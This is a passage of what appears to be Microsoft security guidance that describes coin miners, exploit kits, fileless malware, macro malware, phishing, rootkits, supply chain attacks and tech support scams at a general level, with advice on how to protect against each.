You can create rules to send email notifications for notification recipients. See Configure
alert notifications to create, edit, delete, or troubleshoot email notification, for details.
Next steps
To proactively hunt threats across endpoints, Office 365, cloud applications, and
identity, refer to Microsoft Defender Experts for Hunting.
 Tip
Feedback

Coin miners
Article • 02/28/2024
Cybercriminals are always looking for new ways to make money. With the rise of digital
currencies, also known as cryptocurrencies, criminals see a unique opportunity to
infiltrate an organization and secretly mine for coins by reconfiguring malware.
How coin miners work

Many infections start with:
Email messages with attachments that try to install malware.
Websites hosting exploit kits that attempt to use vulnerabilities in web browsers
and other software to install coin miners.
Websites taking advantage of computer processing power by running scripts while

users browse the website.
Mining is the process of running complex mathematical calculations necessary to

maintain the blockchain ledger. This process generates coins but requires significant
computing resources.
Coin miners aren't inherently malicious. Some individuals and organizations invest in
hardware and electric power for legitimate coin mining operations. However, others
look for alternative sources of computing power and try to find their way into corporate
networks. These coin miners aren't wanted in enterprise environments because they eat
up precious computing resources.
Cybercriminals see an opportunity to make money by running malware campaigns that

distribute, install, and run trojanized miners at the expense of other people's computing
resources.
Examples
DDE exploits, which have been known to distribute ransomware, are now delivering
miners.
For example, a sample of the malware detected as Trojan:Win32/Coinminer (SHA-256:

7213cbbb1a634d780f9bb861418eb262f58954e6e5dca09ca50c1e1324451293) is
installed by Exploit:O97M/DDEDownloader.PA, a Word document that contains the DDE
exploit.
The exploit launches a cmdlet that executes a malicious PowerShell script
(Trojan:PowerShell/Maponeir.A). It downloads the trojanized miner, a modified version
of the miner XMRig, which then mines Monero cryptocurrency.
How to protect against coin miners

Enable potentially unwanted applications (PUA) detection. Some coin mining tools
aren't considered malware but are detected as PUA. Many applications detected as PUA
can negatively impact machine performance and employee productivity. In enterprise
environments, you can stop adware, torrent downloaders, and coin mining by enabling
PUA detection.
Since coin miners are becoming a popular payload in many different kinds of attacks,
see general tips on how to prevent malware infection.
For more information on coin miners, see the blog post Invisible resource thieves: The
increasing threat of cryptocurrency miners .
Feedback

Exploits and exploit kits
Article • 02/28/2024
Exploits take advantage of vulnerabilities in software. A vulnerability is like a hole in your

software that malware can use to get onto your device. Malware exploits these
vulnerabilities to bypass your computer's security safeguards to infect your device.
How exploits and exploit kits work

Exploits are often the first part of a larger attack. Hackers scan for outdated systems that
contain critical vulnerabilities, which they then exploit by deploying targeted malware.
Exploits often include shellcode, which is a small malware payload used to download
additional malware from attacker-controlled networks. Shellcode allows hackers to
infect devices and infiltrate organizations.
Exploit kits are more comprehensive tools that contain a collection of exploits. These kits
scan devices for different kinds of software vulnerabilities and, if any are detected,
deploy additional malware to further infect a device. Kits can use exploits targeting
various software, including Adobe Flash Player, Adobe Reader, Internet Explorer, Oracle
Java, and Sun Java.
The most common method used by attackers to distribute exploits and exploit kits is
through webpages, but exploits can also arrive in emails. Some websites unknowingly
and unwillingly host malicious code and exploits in their ads.
The infographic below shows how an exploit kit might attempt to exploit a device after
you visit a compromised webpage.
Figure 1. Example of how to exploit kits work
Several notable threats, including Wannacry, exploit the Server Message Block (SMB)
vulnerability CVE-2017-0144 to launch malware.
Examples of exploit kits:
Angler / Axpergle
Neutrino
Nuclear
To learn more about exploits, read this blog post on taking apart a double zero-day
sample discovered in joint hunt with ESET.
How we name exploits

We categorize exploits in our Malware encyclopedia by the "platform" they target. For
example, Exploit:Java/CVE-2013-1489.A is an exploit that targets a vulnerability in Java.
A project called "Common Vulnerabilities and Exposures (CVE)" is used by many security
software vendors. The project gives each vulnerability a unique number, for example,
CVE-2016-0778. The portion "2016" refers to the year the vulnerability was discovered.
The "0778" is a unique ID for this specific vulnerability.
You can read more on the CVE website .
How to protect against exploits

The best prevention for exploits is to keep your organization's software up to date .
Software vendors provide updates for many known vulnerabilities, so make sure these
updates are applied to all devices.
For more general tips, see prevent malware infection.
Feedback

Fileless threats
Article • 02/28/2024
What exactly are fileless threats? The term "fileless" suggests that a threat doesn't come
in a file, such as a backdoor that lives only in the memory of a machine. However, there's
no one definition for fileless malware. The term is used broadly, and sometimes to
describe malware families that do rely on files to operate.
Attacks involve several stages for functionalities like execution, persistence, or

information theft. Some parts of the attack chain may be fileless, while others may
involve the file system in some form.
For clarity, fileless threats are grouped into different categories.
Figure 1. Comprehensive diagram of fileless malware

Fileless threats can be classified by their entry point, which indicates how fileless
malware can arrive on a machine. They can arrive via an exploit, through compromised
hardware, or via regular execution of applications and scripts.
Next, list the form of entry point. For example, exploits can be based on files or network
data, PCI peripherals are a type of hardware vector, and scripts and executables are
subcategories of the execution vector.
Finally, classify the host of the infection. For example, a Flash application may contain a
variety of threats such as an exploit, a simple executable, and malicious firmware from a
hardware device.
Classifying helps you divide and categorize the various kinds of fileless threats. Some are
more dangerous but also more difficult to implement, while others are more commonly
used despite (or precisely because of) not being very advanced.
From this categorization, you can glean three main types of fileless threats based on
how much fingerprint they may leave on infected machines.
Type I: No file activity performed

A fully fileless malware can be considered one that never requires writing a file on the
disk. How would such malware infect a machine in the first place? One example is where
a target machine receives malicious network packets that exploit the EternalBlue
vulnerability. The vulnerability allows the installation of the DoublePulsar backdoor,
which ends up residing only in the kernel memory. In this case, there's no file or any
data written on a file.
A compromised device may also have malicious code hiding in device firmware (such as
a BIOS), a USB peripheral (like the BadUSB attack), or in the firmware of a network card.
All these examples don't require a file on the disk to run, and can theoretically live only
in memory. The malicious code would survive reboots, disk reformats, and OS reinstalls.
Infections of this type can be particularly difficult to detect because most antivirus
products don't have the capability to inspect firmware. In cases where a product does
have the ability to inspect and detect malicious firmware, there are still significant
challenges associated with remediation of threats at this level. This type of fileless
malware requires high levels of sophistication and often depends on particular hardware
or software configuration. It's not an attack vector that can be exploited easily and
reliably. While dangerous, threats of this type are uncommon and not practical for most
attacks.
Type II: Indirect file activity
There are other ways that malware can achieve fileless presence on a machine without
requiring significant engineering effort. Fileless malware of this type doesn't directly
write files on the file system, but they can end up using files indirectly. For example, with
the Poshspy backdoor attackers installed a malicious PowerShell command within the
WMI repository and configured a WMI filter to run the command periodically.
It's possible to carry out such installation via command line without requiring a
backdoor to already be on the file. The malware can be installed and theoretically run
without ever touching the file system. However, the WMI repository is stored on a
physical file in a central storage area managed by the CIM Object Manager, and usually
contains legitimate data. Even though the infection chain does technically use a physical
file, it's considered a fileless attack because the WMI repository is a multi-purpose data
container that can't be detected and removed.
Type III: Files required to operate

Some malware can have a sort of fileless persistence, but not without using files to
operate. An example for this scenario is Kovter, which creates a shell open verb handler
in the registry for a random file extension. Opening a file with such extension will lead to
the execution of a script through the legitimate tool mshta.exe.
Figure 2. Kovter's registry key
When the open verb is invoked, the associated command from the registry is launched,
which results in the execution of a small script. This script reads data from a further
registry key and executes it, in turn leading to the loading of the final payload. However,
to trigger the open verb in the first place, Kovter has to drop a file with the same
extension targeted by the verb (in the example above, the extension is .bbf5590fd). It
also has to set an autorun key configured to open such file when the machine starts.
Kovter is considered a fileless threat because the file system is of no practical use. The
files with random extensions contain junk data that isn't usable in verifying the presence
of the threat. The files that store the registry are containers that can't be detected and
deleted if malicious content is present.
Categorizing fileless threats by infection host
Having described the broad categories, we can now dig into the details and provide a
breakdown of the infection hosts. This comprehensive classification covers the
panorama of what is usually referred to as fileless malware. It drives our efforts to
research and develop new protection features that neutralize classes of attacks and
ensure malware doesn't get the upper hand in the arms race.
Exploits
File-based (Type III: executable, Flash, Java, documents): An initial file may exploit the
operating system, the browser, the Java engine, the Flash engine, etc. to execute a
shellcode and deliver a payload in memory. While the payload is fileless, the initial entry
vector is a file.
Network-based (Type I): A network communication that takes advantage of a

vulnerability in the target machine can achieve code execution in the context of an
application or the kernel. An example is WannaCry, which exploits a previously fixed
vulnerability in the SMB protocol to deliver a backdoor within the kernel memory.
Hardware
Device-based (Type I: network card, hard disk): Devices like hard disks and network
cards require chipsets and dedicated software to function. Software residing and
running in the chipset of a device is called firmware. Although a complex task, the
firmware can be infected by malware.
CPU-based (Type I): Modern CPUs are complex and may include subsystems running
firmware for management purposes. Such firmware may be vulnerable to hijacking and
allow the execution of malicious code that would operate from within the CPU. In
December 2017, two researchers reported a vulnerability that can allow attackers to
execute code inside the Management Engine (ME) present in any modern CPU from
Intel. Meanwhile, the attacker group PLATINUM has been observed to have the
capability to use Intel's Active Management Technology (AMT) to perform invisible
network communications , bypassing the installed operating system. ME and AMT are
essentially autonomous micro-computers that live inside the CPU and that operate at a
very low level. Because these technologies' purpose is to provide remote manageability,
they have direct access to hardware, are independent of the operating system, and can
run even if the computer is turned off.
Besides being vulnerable at the firmware level, CPUs could be manufactured with
backdoors inserted directly in the hardware circuitry. This attack has been researched
and proved possible in the past. It has been reported that certain models of x86
processors contain a secondary embedded RISC-like CPU core that can effectively
provide a backdoor through which regular applications can gain privileged execution.
USB-based (Type I): USB devices of all kinds can be reprogrammed with malicious
firmware capable of interacting with the operating system in nefarious ways. For
example, the BadUSB technique allows a reprogrammed USB stick to act as a
keyboard that sends commands to machines via keystrokes, or as a network card that
can redirect traffic at will.
BIOS-based (Type I): A BIOS is a firmware running inside a chipset. It executes when a
machine is powered on, initializes the hardware, and then transfers control to the boot
sector. The BIOS is an important component that operates at a low level and executes
before the boot sector. It's possible to reprogram the BIOS firmware with malicious
code, as has happened in the past with the Mebromi rootkit .
Hypervisor-based (Type I): Modern CPUs provide hardware hypervisor support, allowing
the operating system to create robust virtual machines. A virtual machine runs in a
confined, simulated environment, and is in theory unaware of the emulation. A malware
taking over a machine may implement a small hypervisor to hide itself outside of the
realm of the running operating system. Malware of this kind has been theorized in the
past, and eventually real hypervisor rootkits have been observed , although few are
known to date.
Execution and injection

File-based (Type III: executables, DLLs, LNK files, scheduled tasks): This is the standard
execution vector. A simple executable can be launched as a first-stage malware to run
an additional payload in memory, or injected into other legitimate running processes.
Macro-based (Type III: Office documents): The VBA language is a flexible and powerful
tool designed to automate editing tasks and add dynamic functionality to documents.
As such, it can be abused by attackers to carry out malicious operations like decoding,
running, or injecting an executable payload, or even implementing an entire
ransomware, like in the case of qkG . Macros are executed within the context of an
Office process (e.g., Winword.exe) and implemented in a scripting language. There's no
binary executable that an antivirus can inspect. While Office apps require explicit
consent from the user to execute macros from a document, attackers use social
engineering techniques to trick users into allowing macros to execute.
Script-based (Type II: file, service, registry, WMI repo, shell): The JavaScript, VBScript, and
PowerShell scripting languages are available by default on Windows platforms. Scripts
have the same advantages as macros, they are textual files (not binary executables) and
run within the context of the interpreter (like wscript.exe, powershell.exe), which is a
clean and legitimate component. Scripts are versatile and can be run from a file (by
double-clicking them) or executed directly on the command line of an interpreter.
Running on the command line allows malware to encode malicious scripts as autostart
services inside autorun registry keys as WMI event subscriptions from the WMI
repo. Furthermore, an attacker who has gained access to an infected machine may input
the script on the command prompt.
Disk-based (Type II: Boot Record): The Boot Record is the first sector of a disk or volume,
and contains executable code required to start the boot process of the operating
system. Threats like Petya are capable of infecting the Boot Record by overwriting it
with malicious code. When the machine is booted, the malware immediately gains
control. The Boot Record resides outside the file system, but it's accessible by the
operating system. Modern antivirus products have the capability to scan and restore it.
Defeating fileless malware

At Microsoft, we actively monitor the security landscape to identify new threat trends
and develop solutions to mitigate classes of threats. We instrument durable protections
that are effective against a wide range of threats. Through AntiMalware Scan Interface
(AMSI), behavior monitoring, memory scanning, and boot sector protection, Microsoft
Defender for Endpoint can inspect fileless threats even with heavy obfuscation. Machine
learning technologies in the cloud allow us to scale these protections against new and
emerging threats.
To learn more, read: Out of sight but not invisible: Defeating fileless malware with
behavior monitoring, AMSI, and next-gen AV
Additional resources and information

Learn how to deploy threat protection capabilities across Microsoft 365 E5.
Feedback
Macro malware
Article • 02/28/2024
Macros are a powerful way to automate common tasks in Microsoft Office and can
make people more productive. However, macro malware uses this functionality to infect
your device.
How macro malware works

Macro malware hides in Microsoft Office files and is delivered as email attachments or
inside ZIP files. These files use names that are intended to entice or scare people into
opening them. They often look like invoices, receipts, legal documents, and more.
Macro malware was fairly common several years ago because macros ran automatically
whenever a document was opened. In recent versions of Microsoft Office, macros are
disabled by default. Now, malware authors need to convince users to turn on macros so
that their malware can run. They try to scare users by showing fake warnings when a
malicious document is opened.
We've seen macro malware download threats from the following families:
Ransom:MSIL/Swappa
Ransom:Win32/Teerac
TrojanDownloader:Win32/Chanitor
TrojanSpy:Win32/Ursnif
Win32/Fynloski
Worm:Win32/Gamarue
How to protect against macro malware

Make sure macros are disabled in your Microsoft Office applications. In enterprises,
IT admins set the default setting for macros:
Enable or disable macros in Office documents
Don't open suspicious emails or suspicious attachments.
Delete any emails from unknown people or with suspicious content. Spam emails
are the main way macro malware spreads.
Enterprises can prevent macro malware from running executable content using
ASR rules
For more tips on protecting yourself from suspicious emails, see phishing.
Feedback

Phishing trends and techniques
Article • 02/28/2024
Phishing attacks are scams that often use social engineering bait or lure content.
Legitimate-looking communication, usually email, that links to a phishing site is one of
the most common methods used in phishing attacks. The phishing site typically mimics
sign in pages that require users to input credentials and account information. The
phishing site then captures the sensitive information as soon as the user provides it,
giving attackers access to the information.
Below are some of the most common phishing techniques attackers will employ to try to
steal information or gain access to your devices.
Invoice phishing
In this scam, the attacker attempts to lure you with an email stating that you have an
outstanding invoice from a known vendor or company. They then provide a link for you
to access and pay your invoice. When you access the site, the attacker is poised to steal
your personal information and funds.
Payment/delivery scam
You're asked to provide a credit card or other personal information so that your
payment information can be updated with a commonly known vendor or supplier. The
update is requested so that you can take delivery of your ordered goods. Generally, you
may be familiar with the company and have likely done business with them in the past.
However, you aren't aware of any items you have recently purchased from them.
Tax-themed phishing scams

A common IRS phishing scam is receiving an urgent email letter indicating that you owe
money to the IRS. Often the email threatens legal action if you don't access the site in a
timely manner and pay your taxes. When you access the site, the attackers can steal
your personal credit card or bank information and drain your accounts.
Downloads
An attacker sends a fraudulent email requesting you to open or download a document
attachment, such as a PDF. The attachment often contains a message asking you to sign
in to another site, such as email or file sharing websites, to open the document. When
you access these phishing sites using your sign-in credentials, the attacker now has
access to your information and can gain additional personal information about you.
Phishing emails that deliver other threats

Phishing emails are often effective, so attackers sometimes use them to distribute
ransomware through links or attachments in emails. When run, the ransomware encrypts
files and displays a ransom note, which asks you to pay a sum of money to access to
your files.
We have also seen phishing emails that have links to tech support scam websites. These
websites use various scare tactics to trick you into calling hotlines and paying for
unnecessary "technical support services" that supposedly fix contrived device, platform,
or software problems.
Spear phishing
Spear phishing is a targeted phishing attack that involves highly customized lure
content. Attackers will typically do reconnaissance work by surveying social media and
other information sources about their intended target.
Spear phishing may involve tricking you into logging into fake sites and divulging
credentials. I may also lure you into opening documents by clicking on links that
automatically install malware. With this malware in place, attackers can remotely
manipulate the infected computer.
The implanted malware serves as the point of entry for a more sophisticated attack,
known as an advanced persistent threat (APT). APTs are designed to establish control
and steal data over extended periods. Attackers may try to deploy more covert hacking
tools, move laterally to other computers, compromise or create privileged accounts, and
regularly exfiltrate information from compromised networks.
Whaling
Whaling is a form of phishing directed at high-level or senior executives within specific
companies to gain access to their credentials and/or bank information. The content of
the email may be written as a legal subpoena, customer complaint, or other executive
issue. This type of attack can also lead to an APT attack within an organization.
Business email compromise
Business email compromise (BEC) is a sophisticated scam that targets businesses who
frequently work with foreign suppliers or do money wire transfers. One of the most
common schemes used by BEC attackers involves gaining access to a company's
network through a spear phishing attack. The attacker creates a domain similar to the
company they're targeting, or spoofs their email to scam users into releasing personal
account information for money transfers.
More information about phishing attacks

For information on the latest phishing attacks, techniques, and trends, you can read
these entries on the Microsoft Security blog :
Phishers unleash simple but effective social engineering techniques using PDF
attachments
Tax themed phishing and malware attacks proliferate during the tax filing season
Phishing like emails lead to tech support scam
Feedback

How to protect against phishing attacks
Article • 02/28/2024
Phishing attacks attempt to steal sensitive information through emails, websites, text
messages, or other forms of electronic communication. They try to look like official
communication from legitimate companies or individuals.
Cybercriminals often attempt to steal usernames, passwords, credit card details, bank
account information, or other credentials. They use stolen information for malicious
purposes, such as hacking, identity theft, or stealing money directly from bank accounts
and credit cards. The information can also be sold in cybercriminal underground
markets.
Social engineering attacks are designed to take advantage of a user's possible lapse in
decision-making. Be aware and never provide sensitive or personal information through
email or unknown websites, or over the phone. Remember, phishing emails are
designed to appear legitimate.
Learn the signs of a phishing scam

The best protection is awareness and education. Don't open attachments or links in
unsolicited emails, even if the emails came from a recognized source. If the email is
unexpected, be wary about opening the attachment and verify the URL.
Enterprises should educate and train their employees to be wary of any communication
that requests personal or financial information. They should also instruct employees to
report the threat to the company's security operations team immediately.
Here are several telltale signs of a phishing scam:
The links or URLs provided in emails are not pointing to the correct location or
are pointing to a third-party site not affiliated with the sender of the email. For
example, in the image below the URL provided doesn't match the URL that you'll
be taken to.
There's a request for personal information such as social security numbers or

bank or financial information. Official communications won't generally request
personal information from you in the form of an email.
Items in the email address will be changed so that it's similar enough to a
legitimate email address, but has added numbers or changed letters.
The message is unexpected and unsolicited. If you suddenly receive an email from
an entity or a person you rarely deal with, consider this email suspect.
The message or the attachment asks you to enable macros, adjust security
settings, or install applications. Normal emails won't ask you to do this.
The message contains errors. Legitimate corporate messages are less likely to have
typographic or grammatical errors or contain wrong information.
The sender address doesn't match the signature on the message itself. For
example, an email is purported to be from Mary of Contoso Corp, but the sender
address is john@example.com.
There are multiple recipients in the "To" field and they appear to be random
addresses. Corporate messages are normally sent directly to individual recipients.
The greeting on the message itself doesn't personally address you. Apart from
messages that mistakenly address a different person, greetings that misuse your
name or pull your name directly from your email address tend to be malicious.
The website looks familiar but there are inconsistencies or things that aren't quite
right. Warning signs include outdated logos, typos, or ask users to give additional
information that isn't asked by legitimate sign-in websites.
The page that opens is not a live page, but rather an image that is designed to
look like the site you're familiar with. A pop-up might appear that requests
credentials.
If in doubt, contact the business by known channels to verify if any suspicious emails are
in fact legitimate.
Software solutions for organizations

Microsoft Edge and Windows Defender Application Guard offer protection from
the increasing threat of targeted attacks using Microsoft's industry-leading Hyper-
V virtualization technology. If a browsed website is deemed untrusted, the Hyper-V
container isolates that device from the rest of your network which will prevent
access to your enterprise data.
Microsoft Exchange Online Protection (EOP) offers enterprise-class reliability and
protection against spam and malware, while maintaining access to email during
and after emergencies. Using various layers of filtering, EOP can provide different
controls for spam filtering, such as bulk mail controls and international spam, that
improves your protection.
Use Microsoft Defender for Office 365 to help protect your email, files, and
online storage against malware. It offers holistic protection in Microsoft Teams,
Word, Excel, PowerPoint, Visio, SharePoint Online, and OneDrive for Business. By
protecting against unsafe attachments and expanding protection against malicious
links, it complements the security features of Exchange Online Protection to
provide better zero-day protection.
What to do if you've been a victim of a

phishing scam
If you think you've been a victim of a phishing attack:
1. Contact your IT admin if you are on a work computer

2. Immediately change all passwords associated with the accounts
3. Report any fraudulent activity to your bank and credit card company
Reporting spam
Outlook.com: If you receive a suspicious email message that asks for personal
information, select the check box next to the message in your Outlook inbox.
Select the arrow next to Junk, and then select Phishing.
Microsoft Office Outlook: While in the suspicious message, select Report message
from the ribbon, and then select Phishing.
Microsoft 365: Use the Submissions portal in Microsoft 365 Defender to submit
the junk or phishing sample to Microsoft for analysis. For more information, see
How do I report a suspicious email or file to Microsoft?.
Anti-Phishing Working Group: phishing-report@us-cert.gov. The group uses

reports generated from emails sent to fight phishing scams and hackers. ISPs,
security vendors, financial institutions, and law enforcement agencies are involved.
If you're on a suspicious website

Microsoft Edge: While you're on a suspicious site, select the More (...) icon > Help
and feedback > Report Unsafe site. Follow the instructions on the webpage that
displays to report the website.
Internet Explorer: While you're on a suspicious site, select the gear icon, point to
Safety, and then select Report Unsafe Website. Follow the instructions on the
webpage that displays to report the website.
More information about phishing attacks

Protect yourself from phishing
Phishing trends
Feedback

Prevent malware infection
Article • 02/28/2024
Attackers are always looking for new ways to infect computers. Follow the tips below to
stay protected and minimize threats to your data and accounts.
Keep software up to date

Exploits typically use vulnerabilities in software. It's important to keep your software,
apps, and operating systems up to date.
To keep Microsoft software up to date, ensure that automatic Microsoft Updates are
enabled. Also, upgrade to the latest version of Windows to benefit from the latest built-
in security enhancements.
Be wary of links and attachments

Email, SMS messages, Microsoft Teams chat, and other messaging tools are a few of the
most common ways attackers can infect devices. Attachments or links in messages can
open malware directly or can stealthily trigger a download.
Use an email service that provides protection against malicious attachments, links,
and abusive senders. Microsoft Office 365 has built-in anti-malware, link
protection, and spam filtering. Microsoft Outlook contains additional security
configurations and settings you can enable. See Advanced Outlook.com security
for Microsoft 365 subscribers
Some attackers try to get you to share information about your login information,
passwords, and more. Be aware of some of the common tactics attackers use to try
to trick you. For more information, see phishing.
Watch out for malicious or compromised

websites
When you visit malicious or compromised sites, your device can get infected with
malware automatically or you can get tricked into downloading and installing malware.
See exploits and exploit kits as an example of how some of these sites can automatically
install malware to visiting computers.
To identify potentially harmful websites, keep the following in mind:

The initial part (domain) of a website address should represent the company that
owns the site you're visiting. Check the domain for misspellings. For example,
malicious sites commonly use domain names that swap the letter O with a zero (0)
or the letters L and I with a one (1). If example.com is spelled examp1e.com , the site
you're visiting is suspect.
Sites that aggressively open popups and display misleading buttons often trick
users into accepting content through constant popups or mislabeled buttons.
To block malicious websites, use a modern web browser like Microsoft Edge that
identifies phishing and malware websites and checks downloads for malware.
If you encounter an unsafe site, click More [...] > Send feedback on Microsoft Edge. You
can also report unsafe sites directly to Microsoft .
Pirated material on compromised websites

Using pirated content isn't only illegal, it can also expose your device to malware. Sites
that offer pirated software and media are also often used to distribute malware when
the site is visited. Sometimes pirated software is bundled with malware and other
unwanted software when downloaded, including intrusive browser plugins and adware.
Users don't openly discuss visits to these sites, so any untoward experience are more
likely to stay unreported.
To stay safe, download movies, music, and apps from official publisher websites or
stores.
Don't attach unfamiliar removable drives

Some types of malware spread by copying themselves to USB flash drives or other
removable drives. There are malicious individuals that intentionally prepare and
distribute infected drives by leaving them in public places for unsuspecting individuals.
Only use removable drives that you're familiar with or that come from a trusted source.
If a drive has been used in publicly accessible devices, like computers in a café or a
library, make sure you have antimalware running on your computer before you use the
drive. Avoid opening unfamiliar files you find on suspect drives, including Office and
PDF documents and executable files.
Use a non-administrator account

At the time they're launched, whether inadvertently by a user or automatically, most
malware run under the same privileges as the active user. This means that by limiting
account privileges, you can prevent malware from making consequential changes any
devices.
By default, Windows uses User Account Control (UAC) to provide automatic, granular
control of privileges—it temporarily restricts privileges and prompts the active user
every time an application attempts to make potentially consequential changes to the
system. Although UAC helps limit the privileges of admin users, users can override this
restriction when prompted. As a result, it's quite easy for an admin user to inadvertently
allow malware to run.
To help ensure that everyday activities don't result in malware infection and other
potentially catastrophic changes, it's recommended that you use a non-administrator
account for regular use. By using a non-administrator account, you can prevent
installation of unauthorized apps and prevent inadvertent changes to system settings.
Avoid browsing the web or checking email using an account with administrator
privileges.
Whenever necessary, log in as an administrator to install apps or make configuration

changes that require admin privileges.
Read about creating user accounts and giving administrator privileges
Other safety tips

To further ensure that data is protected from malware and other threats:
Backup files. Follow the 3-2-1 rule: make 3 copies, store in at least 2 locations, with
at least 1 offline copy. Use OneDrive for reliable cloud-based copies that allow
access to files from multiple devices and helps recover damaged or lost files,
including files locked by ransomware.
Be wary when connecting to public Wi-Fi hotspots, particularly those that don't
require authentication.
Use strong passwords and enable multi-factor authentication.
Don't use untrusted devices to log on to email, social media, and corporate
accounts.
Avoid downloading or running older apps. Some of these apps might have
vulnerabilities. Also, older file formats for Office 2003 (.doc, .pps, and .xls) allow
macros or run. This could be a security risk.
Software solutions
Microsoft provides comprehensive security capabilities that help protect against threats.
We recommend:
Automatic Microsoft updates keeps software up to date to get the latest

protections.
Microsoft Edge browser protects against threats such as ransomware by

preventing exploit kits from running. By using Windows Defender SmartScreen,
Microsoft Edge blocks access to malicious websites.
Microsoft Defender Antivirus is built into Windows and helps provide real-time
protection against viruses, malware, and other attacks.
Microsoft Safety Scanner helps remove malicious software from computers. NOTE:
This tool doesn't replace your antimalware product.
Microsoft Defender is the simple way to protect your digital life and all of your
devices. It's included as part of your Microsoft 365 Family, or Personal, subscription
at no extra cost.
Use Zero Trust

Businesses should move to a Zero Trust security strategy. Zero Trust isn't a product or a
service, but an approach in designing and implementing the following set of security
principles:
Verify explicitly
Use least privilege access
Assume breach
Software solutions for business

Microsoft Defender for Business is a security solution designed especially for the
small- and medium-sized business (up to 300 employees). With this endpoint
security solution, your company's devices are better protected from ransomware,
malware, phishing, and other threats.
Microsoft Exchange Online Protection (EOP) offers enterprise-class reliability and

protection against spam and malware, while maintaining access to email during
and after emergencies.
Microsoft Defender for Office 365 includes machine learning capabilities that block
dangerous emails, including millions of emails carrying ransomware downloaders.
OneDrive for Business can back up files, which you would then use to restore
files in the event of an infection.
Microsoft Defender for Endpoint provides comprehensive endpoint protection,

detection, and response capabilities to help prevent ransomware. In the event of a
breach, Microsoft Defender for Endpoint alerts security operations teams about
suspicious activities and automatically attempts to resolve the problem.
Windows Hello for Business replaces passwords with strong two-factor

authentication on your devices. This authentication consists of a new type of user
credential that is tied to a device and uses a biometric or PIN. It lets user
authenticate to an Active Directory or Azure Active Directory account.
What to do with a malware infection

Microsoft Defender for Endpoint antivirus capabilities help reduce the chances of
infection and automatically remove threats that it detects.
In case threat removal is unsuccessful, read about troubleshooting malware detection

and removal problems .
Feedback

Rootkits
Article • 02/28/2024
Malware authors use rootkits to hide malware on your device, allowing malware to
persist as long as possible. A successful rootkit can potentially remain in place for years
if it's undetected. During this time, it steals information and resources.
How rootkits work

Rootkits intercept and change standard operating system processes. After a rootkit
infects a device, you can't trust any information that device reports about itself.
If asked a device to list all of the programs that are running, the rootkit might stealthily
remove any programs it doesn't want you to know about. Rootkits are all about hiding
things. They want to hide both themselves and their malicious activity on a device.
Many modern malware families use rootkits to try to avoid detection and removal,
including:
Alureon
Cutwail
Datrahere (Zacinlo)
Rustock
Sinowal
Sirefef
How to protect against rootkits

Like any other type of malware, the best way to avoid rootkits is to prevent it from being
installed in the first place.
Apply the latest updates to operating systems and apps.
Educate your employees so they can be wary of suspicious websites and emails.
Back up important files regularly. Use the 3-2-1 rule. Keep three backups of your
data, on two different storage types, and at least one backup offsite.
What if I think I have a rootkit on my device?

Microsoft security software includes many technologies designed specifically to remove
rootkits. If you think you have a rootkit, you might need an extra tool that helps you
boot to a known trusted environment.
Microsoft Defender Offline can be launched from the Windows Security app and has
the latest antimalware updates from Microsoft. It's designed to be used on devices that
aren't working correctly because of a possible malware infection.
System Guard in Windows 10 protects against rootkits and threats that affect system
integrity.
What if I can't remove a rootkit?

If the problem persists, we strongly recommend reinstalling the operating system and
security software. Then restore your data from a backup.
Feedback

Supply chain attacks
Article • 02/28/2024
Supply chain attacks are an emerging threats that target software developers and
suppliers. The goal is to access source codes, build processes, or update mechanisms by
infecting legitimate apps to distribute malware.
How supply chain attacks work

Attackers hunt for unsecure network protocols, unprotected server infrastructures, and
unsafe coding practices. They break in, change source codes, and hide malware in build
and update processes.
Because software is built and released by trusted vendors, these apps and updates are
signed and certified. In software supply chain attacks, vendors are likely unaware that
their apps or updates are infected with malicious code when they're released to the
public. The malicious code then runs with the same trust and permissions as the app.
The number of potential victims is significant, given the popularity of some apps. A case
occurred where a free file compression app was poisoned and deployed to customers in
a country/region where it was the top utility app.
Types of supply chain attacks

Compromised software building tools or updated infrastructure
Stolen code-sign certificates or signed malicious apps using the identity of dev
company
Compromised specialized code shipped into hardware or firmware components
Pre-installed malware on devices (cameras, USB, phones, etc.)
To learn more about supply chain attacks, read this blog post called attack inception:
compromised supply chain within a supply chain poses new risks .
How to protect against supply chain attacks

Deploy strong code integrity policies to allow only authorized apps to run.
Use endpoint detection and response solutions that can automatically detect and
remediate suspicious activities.
For software vendors and developers

Maintain a highly secure build and update infrastructure.
Immediately apply security patches for OS and software.
Implement mandatory integrity controls to ensure only trusted tools run.
Require multi-factor authentication for admins.
Build secure software updaters as part of the software development lifecycle.

Require SSL for update channels and implement certificate pinning.
Sign everything, including configuration files, scripts, XML files, and packages.
Check for digital signatures, and don't let the software updater accept generic
input and commands.
Develop an incident response process for supply chain attacks.

Disclose supply chain incidents and notify customers with accurate and timely
information
For more general tips on protecting your systems and devices, see prevent malware
infection.
Feedback

Tech support scams
Article • 02/28/2024
Tech support scams are an industry-wide issue where scammers use scare tactics to trick
users into paying for unnecessary technical support services. These services supposedly
fix contrived device, platform, or software problems.
How tech support scams work

Scammers might call you directly on your phone and pretend to be representatives of a
software company. They might even spoof the caller ID so that it displays a legitimate
support phone number from a trusted company. They can then ask you to install
applications that give them remote access to your device. If the attackers use remote
access, these experienced actors can misrepresent normal system output as signs of
problems.
Scammers might also initiate contact by displaying fake error messages on websites you
visit, displaying support numbers and enticing you to call. They can also put your
browser on full screen and display pop-up messages that won't go away, essentially
locking your browser. These fake error messages aim to trick you into calling an
indicated technical support hotline. Microsoft error and warning messages never include
phone numbers.
When you engage with the scammers, they can offer fake solutions for your "problems"
and ask for payment in the form of a one-time fee or subscription to a purported
support service.
For more information, view known tech support scam numbers and popular web
scams .
How to protect against tech support scams

Share and implement the general tips on how to prevent malware infection.
It's also important to keep the following in mind:
Microsoft doesn't send unsolicited email messages or make unsolicited phone calls
to request personal or financial information, or to fix your computer.
Any communication with Microsoft has to be initiated by you.
Don't call the number in the pop-ups. Microsoft's error and warning messages
never include a phone number.
Download software only from official vendor websites or the Microsoft Store. Be
wary of downloading software from third-party sites, as some of them might have
been modified without the author's knowledge to bundle support scam malware
and other threats.
Use Microsoft Edge when browsing the internet. It blocks known support scam
sites using Windows Defender SmartScreen (which is also used by Internet
Explorer). Furthermore, Microsoft Edge can stop pop-up dialogue loops used by
these sites.
Enable Microsoft Defender Antivirus in Windows 10. It detects and removes known
support scam malware.
What to do if information has been given to a

tech support person
Uninstall applications that scammers asked to be install. Consider resetting the
device to a factory state.
Run a full scan with Microsoft Defender Antivirus to remove any malware. Apply all
security updates as soon as they're available.
Change passwords.
Monitor anomalous sign in activity. Use Windows Firewall to block traffic to
services that you wouldn't normally access.
